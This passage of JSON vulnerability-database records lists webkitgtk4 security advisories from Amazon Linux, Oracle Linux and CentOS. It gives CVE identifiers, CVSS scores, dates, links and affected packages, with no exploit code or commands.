[CVE-2019-8669](<https://vulners.com/cve/CVE-2019-8669>), [CVE-2019-8671](<https://vulners.com/cve/CVE-2019-8671>), [CVE-2019-8672](<https://vulners.com/cve/CVE-2019-8672>), [CVE-2019-8673](<https://vulners.com/cve/CVE-2019-8673>), [CVE-2019-8674](<https://vulners.com/cve/CVE-2019-8674>), [CVE-2019-8676](<https://vulners.com/cve/CVE-2019-8676>), [CVE-2019-8677](<https://vulners.com/cve/CVE-2019-8677>), [CVE-2019-8678](<https://vulners.com/cve/CVE-2019-8678>), [CVE-2019-8679](<https://vulners.com/cve/CVE-2019-8679>), [CVE-2019-8680](<https://vulners.com/cve/CVE-2019-8680>), [CVE-2019-8681](<https://vulners.com/cve/CVE-2019-8681>), [CVE-2019-8683](<https://vulners.com/cve/CVE-2019-8683>), [CVE-2019-8684](<https://vulners.com/cve/CVE-2019-8684>), [CVE-2019-8686](<https://vulners.com/cve/CVE-2019-8686>), [CVE-2019-8687](<https://vulners.com/cve/CVE-2019-8687>), [CVE-2019-8688](<https://vulners.com/cve/CVE-2019-8688>), [CVE-2019-8689](<https://vulners.com/cve/CVE-2019-8689>), [CVE-2019-8690](<https://vulners.com/cve/CVE-2019-8690>), [CVE-2019-8707](<https://vulners.com/cve/CVE-2019-8707>), [CVE-2019-8710](<https://vulners.com/cve/CVE-2019-8710>), [CVE-2019-8719](<https://vulners.com/cve/CVE-2019-8719>), [CVE-2019-8720](<https://vulners.com/cve/CVE-2019-8720>), [CVE-2019-8726](<https://vulners.com/cve/CVE-2019-8726>), [CVE-2019-8733](<https://vulners.com/cve/CVE-2019-8733>), [CVE-2019-8735](<https://vulners.com/cve/CVE-2019-8735>), [CVE-2019-8743](<https://vulners.com/cve/CVE-2019-8743>), [CVE-2019-8763](<https://vulners.com/cve/CVE-2019-8763>), [CVE-2019-8764](<https://vulners.com/cve/CVE-2019-8764>), [CVE-2019-8765](<https://vulners.com/cve/CVE-2019-8765>), [CVE-2019-8766](<https://vulners.com/cve/CVE-2019-8766>), [CVE-2019-8768](<https://vulners.com/cve/CVE-2019-8768>), [CVE-2019-8769](<https://vulners.com/cve/CVE-2019-8769>), [CVE-2019-8771](<https://vulners.com/cve/CVE-2019-8771>), [CVE-2019-8782](<https://vulners.com/cve/CVE-2019-8782>), [CVE-2019-8783](<https://vulners.com/cve/CVE-2019-8783>), [CVE-2019-8808](<https://vulners.com/cve/CVE-2019-8808>), [CVE-2019-8811](<https://vulners.com/cve/CVE-2019-8811>), [CVE-2019-8812](<https://vulners.com/cve/CVE-2019-8812>), [CVE-2019-8813](<https://vulners.com/cve/CVE-2019-8813>), [CVE-2019-8814](<https://vulners.com/cve/CVE-2019-8814>), [CVE-2019-8815](<https://vulners.com/cve/CVE-2019-8815>), [CVE-2019-8816](<https://vulners.com/cve/CVE-2019-8816>), [CVE-2019-8819](<https://vulners.com/cve/CVE-2019-8819>), [CVE-2019-8820](<https://vulners.com/cve/CVE-2019-8820>), [CVE-2019-8821](<https://vulners.com/cve/CVE-2019-8821>), [CVE-2019-8822](<https://vulners.com/cve/CVE-2019-8822>), [CVE-2019-8823](<https://vulners.com/cve/CVE-2019-8823>), [CVE-2019-8835](<https://vulners.com/cve/CVE-2019-8835>), [CVE-2019-8844](<https://vulners.com/cve/CVE-2019-8844>), [CVE-2019-8846](<https://vulners.com/cve/CVE-2019-8846>), [CVE-2020-10018](<https://vulners.com/cve/CVE-2020-10018>), [CVE-2020-11793](<https://vulners.com/cve/CVE-2020-11793>), [CVE-2020-3862](<https://vulners.com/cve/CVE-2020-3862>), [CVE-2020-3864](<https://vulners.com/cve/CVE-2020-3864>), [CVE-2020-3865](<https://vulners.com/cve/CVE-2020-3865>), [CVE-2020-3867](<https://vulners.com/cve/CVE-2020-3867>), [CVE-2020-3868](<https://vulners.com/cve/CVE-2020-3868>), [CVE-2020-3885](<https://vulners.com/cve/CVE-2020-3885>), [CVE-2020-3894](<https://vulners.com/cve/CVE-2020-3894>), [CVE-2020-3895](<https://vulners.com/cve/CVE-2020-3895>), [CVE-2020-3897](<https://vulners.com/cve/CVE-2020-3897>), [CVE-2020-3899](<https://vulners.com/cve/CVE-2020-3899>), [CVE-2020-3900](<https://vulners.com/cve/CVE-2020-3900>), [CVE-2020-3901](<https://vulners.com/cve/CVE-2020-3901>), [CVE-2020-3902](<https://vulners.com/cve/CVE-2020-3902>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-09T21:05:00", "type": "amazon", "title": "Medium: webkitgtk4", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8383", "CVE-2019-11070", "CVE-2019-6237", "CVE-2019-6251", "CVE-2019-8506", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8625", "CVE-2019-8644", "CVE-2019-8649", "CVE-2019-8658", "CVE-2019-8666", "CVE-2019-8669", "CVE-2019-8671", "CVE-2019-8672", "CVE-2019-8673", "CVE-2019-8674", "CVE-2019-8676", "CVE-2019-8677", "CVE-2019-8678", "CVE-2019-8679", "CVE-2019-8680", "CVE-2019-8681", "CVE-2019-8683", "CVE-2019-8684", "CVE-2019-8686", "CVE-2019-8687", "CVE-2019-8688", "CVE-2019-8689", "CVE-2019-8690", "CVE-2019-8707", "CVE-2019-8710", "CVE-2019-8719", "CVE-2019-8720", "CVE-2019-8726", "CVE-2019-8733", "CVE-2019-8735", "CVE-2019-8743", "CVE-2019-8763", "CVE-2019-8764", "CVE-2019-8765", "CVE-2019-8766", "CVE-2019-8768", "CVE-2019-8769", "CVE-2019-8771", "CVE-2019-8782", "CVE-2019-8783", "CVE-2019-8808", "CVE-2019-8811", "CVE-2019-8812", "CVE-2019-8813", "CVE-2019-8814", "CVE-2019-8815", "CVE-2019-8816", "CVE-2019-8819", "CVE-2019-8820", "CVE-2019-8821", "CVE-2019-8822", "CVE-2019-8823", "CVE-2019-8835", "CVE-2019-8844", "CVE-2019-8846", "CVE-2020-10018", "CVE-2020-11793", "CVE-2020-3862", "CVE-2020-3864", "CVE-2020-3865", "CVE-2020-3867", "CVE-2020-3868", "CVE-2020-3885", "CVE-2020-3894", "CVE-2020-3895", "CVE-2020-3897", "CVE-2020-3899", "CVE-2020-3900", "CVE-2020-3901", "CVE-2020-3902"], "modified": "2020-11-11T17:22:00", "id": "ALAS2-2020-1563", "href": "https://alas.aws.amazon.com/AL2/ALAS-2020-1563.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2022-04-24T19:47:41", "description": "[2.28.2-2]\n- Resolves: rhbz#1817144 Rebuild to support ppc and s390\n[2.28.2-1]\n- Resolves: rhbz#1817144 Rebase to 2.28.2", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-06T00:00:00", "type": "oraclelinux", "title": "webkitgtk4 security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11070", "CVE-2019-6237", "CVE-2019-6251", "CVE-2019-8506", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8625", "CVE-2019-8644", "CVE-2019-8649", "CVE-2019-8658", "CVE-2019-8666", "CVE-2019-8669", "CVE-2019-8671", "CVE-2019-8672", "CVE-2019-8673", "CVE-2019-8674", "CVE-2019-8676", "CVE-2019-8677", "CVE-2019-8678", "CVE-2019-8679", "CVE-2019-8680", "CVE-2019-8681", "CVE-2019-8683", "CVE-2019-8684", "CVE-2019-8686", "CVE-2019-8687", "CVE-2019-8688", "CVE-2019-8689", "CVE-2019-8690", "CVE-2019-8707", "CVE-2019-8710", "CVE-2019-8719", "CVE-2019-8720", "CVE-2019-8726", "CVE-2019-8733", "CVE-2019-8735", "CVE-2019-8743", "CVE-2019-8763", "CVE-2019-8764", "CVE-2019-8765", "CVE-2019-8766", "CVE-2019-8768", "CVE-2019-8769", "CVE-2019-8771", "CVE-2019-8782", "CVE-2019-8783", "CVE-2019-8808", "CVE-2019-8811", "CVE-2019-8812", "CVE-2019-8813", "CVE-2019-8814", "CVE-2019-8815", "CVE-2019-8816", "CVE-2019-8819", "CVE-2019-8820", "CVE-2019-8821", "CVE-2019-8822", "CVE-2019-8823", "CVE-2019-8835", "CVE-2019-8844", "CVE-2019-8846", "CVE-2020-10018", "CVE-2020-11793", "CVE-2020-3862", "CVE-2020-3864", "CVE-2020-3865", "CVE-2020-3867", "CVE-2020-3868", "CVE-2020-3885", "CVE-2020-3894", "CVE-2020-3895", "CVE-2020-3897", "CVE-2020-3899", "CVE-2020-3900", "CVE-2020-3901", "CVE-2020-3902"], "modified": "2020-10-06T00:00:00", "id": "ELSA-2020-4035", "href": "http://linux.oracle.com/errata/ELSA-2020-4035.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2023-12-03T19:56:11", "description": "**CentOS Errata and Security Advisory** CESA-2020:4035\n\n\nWebKitGTK+ is port of the WebKit portable web rendering engine to the GTK+ platform. These packages provide WebKitGTK+ for GTK+ 3.\n\nThe following packages have been upgraded to a later upstream version: webkitgtk4 (2.28.2). (BZ#1817144)\n\nSecurity Fix(es):\n\n* webkitgtk: Multiple security issues (CVE-2019-6237, CVE-2019-6251, CVE-2019-8506, CVE-2019-8524, CVE-2019-8535, CVE-2019-8536, CVE-2019-8544, CVE-2019-8551, CVE-2019-8558, CVE-2019-8559, CVE-2019-8563, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8607, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8625, CVE-2019-8644, CVE-2019-8649, CVE-2019-8658, CVE-2019-8666, CVE-2019-8669, CVE-2019-8671, CVE-2019-8672, CVE-2019-8673, CVE-2019-8674, CVE-2019-8676, CVE-2019-8677, CVE-2019-8678, CVE-2019-8679, CVE-2019-8680, CVE-2019-8681, CVE-2019-8683, CVE-2019-8684, CVE-2019-8686, CVE-2019-8687, CVE-2019-8688, CVE-2019-8689, CVE-2019-8690, CVE-2019-8707, CVE-2019-8710, CVE-2019-8719, CVE-2019-8720, CVE-2019-8726, CVE-2019-8733, CVE-2019-8735, CVE-2019-8743, CVE-2019-8763, CVE-2019-8764, CVE-2019-8765, CVE-2019-8766, CVE-2019-8768, CVE-2019-8769, CVE-2019-8771, CVE-2019-8782, CVE-2019-8783, CVE-2019-8808, CVE-2019-8811, CVE-2019-8812, CVE-2019-8813, CVE-2019-8814, CVE-2019-8815, CVE-2019-8816, CVE-2019-8819, CVE-2019-8820, CVE-2019-8821, CVE-2019-8822, CVE-2019-8823, CVE-2019-8835, CVE-2019-8844, CVE-2019-8846, CVE-2019-11070, CVE-2020-3862, CVE-2020-3864, CVE-2020-3865, CVE-2020-3867, CVE-2020-3868, CVE-2020-3885, CVE-2020-3894, CVE-2020-3895, CVE-2020-3897, CVE-2020-3899, CVE-2020-3900, CVE-2020-3901, CVE-2020-3902, CVE-2020-10018, CVE-2020-11793)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.9 Release Notes linked from the References section.\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-cr-announce/2020-October/032934.html\n\n**Affected packages:**\nwebkitgtk4\nwebkitgtk4-devel\nwebkitgtk4-doc\nwebkitgtk4-jsc\nwebkitgtk4-jsc-devel\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2020:4035", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-20T19:07:36", "type": "centos", "title": "webkitgtk4 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false,